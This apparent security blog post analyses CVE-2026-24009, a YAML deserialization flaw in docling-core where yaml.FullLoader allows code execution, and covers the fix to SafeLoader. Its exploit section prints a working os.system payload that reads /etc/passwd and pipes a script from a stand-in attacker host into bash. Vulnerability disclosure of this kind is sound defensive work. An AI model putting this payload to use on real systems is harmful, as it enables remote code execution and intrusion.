CVE-2026-24009

YAML Deserialization: The Gift That Keeps on Giving in Docling-Core

Alon Barad
Alon Barad
Software Engineer

Jan 23, 2026·5 min read·4 visits

Executive Summary (TL;DR)

The `docling-core` library, used for processing and modeling documents, contained a critical vulnerability in its YAML loading mechanism. By explicitly using `yaml.FullLoader` instead of `SafeLoader`, the library allowed the deserialization of arbitrary Python objects. This means if you can get the application to parse a malicious YAML file, you can execute code on the server. The fix is a one-line change to `SafeLoader` in version 2.48.4.

A classic remote code execution vulnerability in the docling-core library caused by the insecure use of PyYAML's FullLoader, allowing attackers to turn document processing pipelines into remote shells.

The Hook: Parsing Untrusted Data Like It's 2015

In the world of secure coding, there are certain patterns that serve as giant neon signs pointing to a vulnerability. Using strcpy in C is one. Passing user input to eval() in JavaScript is another. And in the Python ecosystem, unpickling data or using insecure YAML loaders is the holy grail of 'oops, I just gave you root.'

docling-core is a library designed to handle the heavy lifting of document processing—converting PDFs, images, and other formats into structured data. It's the kind of library that sits deep inside enterprise AI pipelines, often running with significant resources to handle OCR and text extraction. This makes it a high-value target. If you can compromise the parser, you don't just break the application; you gain a foothold in the data processing backend.

The vulnerability here isn't novel; it's a regression to a solved problem. It revolves around how the library loads YAML configuration or document representations. Instead of treating the input as data, the library treated it as a blueprint for object instantiation. In simpler terms: the application trusted the file to tell it what code to run.

The Flaw: FullLoader vs. Common Sense

The root cause of CVE-2026-24009 is the explicit usage of yaml.FullLoader. To understand why this is a catastrophic error, we need to look at how PyYAML functions. In older versions of PyYAML, the default yaml.load() was unsafe because it would happily construct any Python object defined in the YAML tags. The community screamed, and PyYAML changed the default behavior to require an explicit Loader argument, encouraging safety.

However, yaml.FullLoader exists for backward compatibility and for specific use cases where you trust the input. It supports tags like !!python/object/apply and !!python/object/new. These tags tell the Python interpreter: 'Hey, don't just read this string; actually import this module and run this function with these arguments.'

The developer behind this code likely chose FullLoader because they wanted to support complex data structures or legacy YAML files without realizing the security implication. It’s the classic trade-off: developer convenience vs. security. In this case, convenience won, and security took a vacation. By using FullLoader on files that could potentially originate from an external user (a 'document'), the library opened a direct channel for Remote Code Execution (RCE).

The Code: One Line of Doom

Let's look at the smoking gun. The vulnerability existed in docling_core/types/doc/document.py. The function load_from_yaml takes a filename, opens it, and parses it. Here is the vulnerable implementation:

# The "Before" Code (Vulnerable)
def load_from_yaml(cls, filename: Union[str, Path]) -> "DoclingDocument":
    if isinstance(filename, str):
        filename = Path(filename)
    with open(filename, encoding="utf-8") as f:
        # CRITICAL FLAW: FullLoader allows arbitrary object instantiation
        data = yaml.load(f, Loader=yaml.FullLoader)
    return DoclingDocument.model_validate(data)

It looks innocent enough, doesn't it? But that Loader=yaml.FullLoader argument is deadly. It explicitly opts out of the default safety mechanisms. The fix, applied in version 2.48.4, was brutally simple:

# The "After" Code (Fixed)
def load_from_yaml(cls, filename: Union[str, Path]) -> "DoclingDocument":
    if isinstance(filename, str):
        filename = Path(filename)
    with open(filename, encoding="utf-8") as f:
        # REMEDIATION: SafeLoader restricts parsing to standard data types
        data = yaml.load(f, Loader=yaml.SafeLoader)
    return DoclingDocument.model_validate(data)

By switching to SafeLoader, the parser now treats the input strictly as data (strings, lists, dictionaries, integers) and ignores any Python-specific tags that try to instantiate classes or call functions.

The Exploit: Weaponizing YAML

Exploiting this is trivially easy if you can feed a file to the load_from_yaml function. We don't need complex memory corruption or heap grooming. We just need to write valid YAML that PyYAML understands as 'run this command'.

A standard payload targeting FullLoader utilizes the subprocess or os modules. Here is what a malicious document.yaml looks like:

!!python/object/apply:os.system
args: ['id; cat /etc/passwd; curl http://attacker-c2.com/revshell | bash']

When the vulnerable docling-core code processes this file:

  1. It parses the tag !!python/object/apply:os.system.
  2. It resolves os.system.
  3. It calls that function with the provided args.
  4. The server executes the shell command.

This attack vector is extremely reliable. Unlike memory corruption bugs which might crash the service if the offsets are wrong, insecure deserialization usually works 100% of the time as long as the gadget (in this case, os.system) is available in the runtime environment. Given that this library is Python-based, os is almost always available.

The Impact: From Processing to Pwnage

The impact of this vulnerability is rated High (CVSS 8.1), and frankly, that might be conservative depending on where this library is deployed. RCE is the endgame.

If docling-core is running inside a Docker container processing user uploads, the attacker gets a shell inside that container. From there, they can attempt container escape, pivot to the cloud metadata service (e.g., AWS Instance Metadata Service), or poison the data pipeline.

Consider a scenario where this library is used to index corporate knowledge bases. An attacker uploads a malicious "policy document" formatted as YAML. The system indexes it, triggers the RCE, and suddenly the attacker has exfiltrated sensitive proprietary data. The integrity and confidentiality of the entire system are completely compromised.

The Fix: Just Use SafeLoader

The remediation is straightforward: Update to version 2.48.4. This version swaps the loader for yaml.SafeLoader. If you are a developer using PyYAML in your own projects, write this on a post-it note and stick it to your monitor: Never use yaml.load() without SafeLoader unless you personally wrote the file being loaded.

If upgrading is impossible for some bureaucratic reason (we've all been there), you can attempt to monkey-patch the loader or ensure strict input validation, but these are fragile defenses. The only true fix is ensuring the parser never attempts to construct complex Python objects from the input stream.

Fix Analysis (1)

Technical Appendix

CVSS Score
8.1/ 10
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Affected Systems

docling-core < 2.48.4Applications implementing docling-core for document ingestionAI/ML pipelines using docling for data preprocessing

Affected Versions Detail

Product
Affected Versions
Fixed Version
docling-core
docling-project
>= 2.21.0, < 2.48.42.48.4
AttributeDetail
CWE IDCWE-502
Attack VectorNetwork
CVSS8.1 (High)
ImpactRemote Code Execution (RCE)
Vulnerable Componentdocling_core.types.doc.DoclingDocument.load_from_yaml
Gadget ChainPyYAML !!python/object/apply
CWE-502
Deserialization of Untrusted Data

The application deserializes untrusted data without sufficiently verifying that the resulting data will be valid.

Vulnerability Timeline

Vulnerability identified and fixed in commit 3e8d628
2025-10-01
Version 2.48.4 released
2025-10-01
Formal CVE requested by reporter
2026-01-20
CVE-2026-24009 Published
2026-01-22

Subscribe to updates

Get the latest CVE analysis reports delivered to your inbox.